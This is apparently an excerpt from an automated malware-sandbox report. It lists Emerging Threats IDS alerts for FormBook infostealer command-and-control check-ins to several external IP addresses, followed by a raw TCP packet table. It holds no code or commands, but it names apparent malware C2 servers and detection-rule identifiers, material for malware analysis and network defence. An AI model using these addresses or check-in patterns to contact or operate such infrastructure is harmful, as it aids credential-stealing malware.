                                                                                                                                              2024-10-04T08:08:57.660518+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049761162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:09:00.343253+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049762162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:09:03.074744+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049763162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:09:03.074744+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049763162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:09:08.397666+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497643.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:11.025336+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497653.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:13.666700+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497663.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:16.303964+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497673.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:16.303964+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497673.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:21.628952+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497683.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:24.255747+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497693.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:26.897559+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497703.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:36.586781+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497713.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:36.586781+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497713.33.130.19080TCP
                                                                                                                                              2024-10-04T08:09:42.768300+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:45.584421+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049773103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:48.428360+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049774103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:51.194765+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049775103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:51.194765+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049775103.21.221.480TCP
                                                                                                                                              2024-10-04T08:09:57.888410+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049776133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:00.688885+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049777133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:03.567159+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049778133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:06.308860+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049779133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:06.308860+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049779133.130.35.9080TCP
                                                                                                                                              2024-10-04T08:10:11.751332+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049780137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:14.445249+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049781137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:17.133476+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049782137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:19.817346+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049783137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:19.817346+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049783137.175.33.5680TCP
                                                                                                                                              2024-10-04T08:10:26.703408+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497843.33.130.19080TCP
                                                                                                                                              2024-10-04T08:10:27.929484+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497853.33.130.19080TCP
                                                                                                                                              2024-10-04T08:10:30.576243+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497863.33.130.19080TCP
                                                                                                                                              2024-10-04T08:10:34.124920+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497873.33.130.19080TCP
                                                                                                                                              2024-10-04T08:10:34.124920+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497873.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:08.503853+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978813.248.169.4880TCP
                                                                                                                                              2024-10-04T08:11:11.139810+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978913.248.169.4880TCP
                                                                                                                                              2024-10-04T08:11:16.421246+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204979113.248.169.4880TCP
                                                                                                                                              2024-10-04T08:11:16.421246+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204979113.248.169.4880TCP
                                                                                                                                              2024-10-04T08:11:21.637551+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497923.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:24.291250+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497933.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:26.917056+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497943.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:29.558581+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497953.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:29.558581+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497953.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:35.698479+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497963.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:37.424219+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497973.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:40.971707+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497983.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:42.691844+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497993.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:42.691844+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497993.33.130.19080TCP
                                                                                                                                              2024-10-04T08:11:55.831625+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204980384.32.84.3280TCP
                                                                                                                                              2024-10-04T08:11:55.831625+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980384.32.84.3280TCP
                                                                                                                                              2024-10-04T08:12:01.158312+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980454.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:03.843560+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980554.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:06.530851+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980654.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:09.217163+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204980754.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:09.217163+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980754.67.87.11080TCP
                                                                                                                                              2024-10-04T08:12:14.710122+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049808194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:17.456583+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049809194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:20.227339+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049810194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:22.981412+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049811194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:22.981412+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049811194.58.112.17480TCP
                                                                                                                                              2024-10-04T08:12:28.589435+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981238.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:31.424116+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981338.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:34.257482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981438.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:37.094000+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204981538.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:37.094000+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204981538.47.207.14680TCP
                                                                                                                                              2024-10-04T08:12:42.323419+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498163.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:44.963088+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498173.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:47.605353+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498183.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:50.239495+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20498193.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:50.239495+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498193.33.130.19080TCP
                                                                                                                                              2024-10-04T08:12:55.602099+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049820162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:12:58.275186+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049821162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:13:00.993932+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049822162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:13:03.685558+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049823162.213.249.21680TCP
                                                                                                                                              2024-10-04T08:13:03.685558+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049823162.213.249.21680TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                              Oct 4, 2024 08:06:05.911832094 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.912060976 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948141098 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.948415041 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948726892 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:05.948919058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948919058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948919058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.948919058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:05.949109077 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.107809067 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.107980013 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.108064890 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.108563900 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.108844042 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.109281063 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.109539032 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.110040903 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.110390902 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.110745907 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.111145973 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.111569881 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.111846924 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.111907005 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.112356901 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.112545013 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.112545013 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.112605095 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.112885952 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.113185883 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.113671064 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.113889933 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.114034891 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.114182949 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.114368916 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.114414930 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.145313025 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.145668030 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.145858049 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.146076918 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.146245956 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.146615028 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.146817923 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.146986961 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.147279024 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.147480965 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.147533894 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.310595989 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.310853958 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.310924053 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.311388969 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.311538935 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.311538935 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.311609030 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.311702013 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.312096119 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.312340975 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.312860966 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.313030005 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313169956 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313585043 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.313782930 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313782930 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313782930 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.313956022 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314421892 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.314614058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314614058 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314615011 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314615011 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.314685106 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.315148115 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.315310955 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.315311909 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.315421104 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.315871000 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.316348076 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.316348076 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.316740990 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.316881895 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.316881895 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.316941977 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.317073107 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.317447901 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.317712069 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.317769051 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.317867041 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:06.318080902 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.368164062 CEST49728443192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:06.368226051 CEST44349728185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:14.723680973 CEST8049727185.86.211.136192.168.11.20
                                                                                                                                              Oct 4, 2024 08:06:14.723895073 CEST4972780192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:27.123589039 CEST4972780192.168.11.20185.86.211.136
                                                                                                                                              Oct 4, 2024 08:06:37.612637997 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:06:38.613061905 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:06:40.628281116 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:06:44.643016100 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:06:52.656934977 CEST4973080192.168.11.20208.91.197.27
                                                                                                                                              Oct 4, 2024 08:07:03.808011055 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:03.912611961 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:03.912884951 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:03.920676947 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:04.021939993 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:04.025481939 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:04.025567055 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:04.025800943 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:04.028363943 CEST4973180192.168.11.2013.248.169.48
                                                                                                                                              Oct 4, 2024 08:07:04.129407883 CEST804973113.248.169.48192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:19.252701998 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:19.353580952 CEST80497323.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:19.353787899 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:19.362390041 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:19.463884115 CEST80497323.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:20.383410931 CEST80497323.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:20.383565903 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:20.869484901 CEST4973280192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:20.970730066 CEST80497323.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:21.886928082 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:21.988404989 CEST80497333.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:21.988658905 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:21.996279955 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:22.097651005 CEST80497333.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:22.100203991 CEST80497333.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:22.100362062 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:23.509594917 CEST4973380192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:23.611105919 CEST80497333.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.527306080 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:24.626372099 CEST80497343.33.130.190192.168.11.20
                                                                                                                                              Oct 4, 2024 08:07:24.626535892 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:24.634145975 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:07:24.634196043 CEST4973480192.168.11.203.33.130.190
                                                                                                                                              Oct 4, 2024 08:08:16.369760990 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370129108 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370234966 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370281935 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370333910 CEST8049749194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:16.370452881 CEST4974980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:16.370609045 CEST4974980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:17.560038090 CEST4974980192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.577482939 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.812299967 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:18.812541962 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.820250988 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.820318937 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:18.820332050 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.055071115 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055139065 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055237055 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.055274963 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055412054 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055522919 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.055752993 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055816889 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055830002 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.055921078 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.055999041 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:19.290141106 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.290174007 CEST8049750194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:19.290297031 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:20.325067043 CEST4975080192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.342545986 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.568346977 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.568557024 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.573641062 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.799113989 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799434900 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799576044 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799711943 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799779892 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799798965 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.799850941 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799906969 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799927950 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.799958944 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.800012112 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:21.800057888 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.800211906 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:21.802138090 CEST4975180192.168.11.20194.58.112.174
                                                                                                                                              Oct 4, 2024 08:08:22.027919054 CEST8049751194.58.112.174192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:26.915813923 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:27.211916924 CEST804975238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:27.212088108 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:27.220604897 CEST4975280192.168.11.2038.47.207.146
                                                                                                                                              Oct 4, 2024 08:08:27.522317886 CEST804975238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:27.522332907 CEST804975238.47.207.146192.168.11.20
                                                                                                                                              Oct 4, 2024 08:08:27.522344112 CEST804975238.47.207.146192.168.11.20
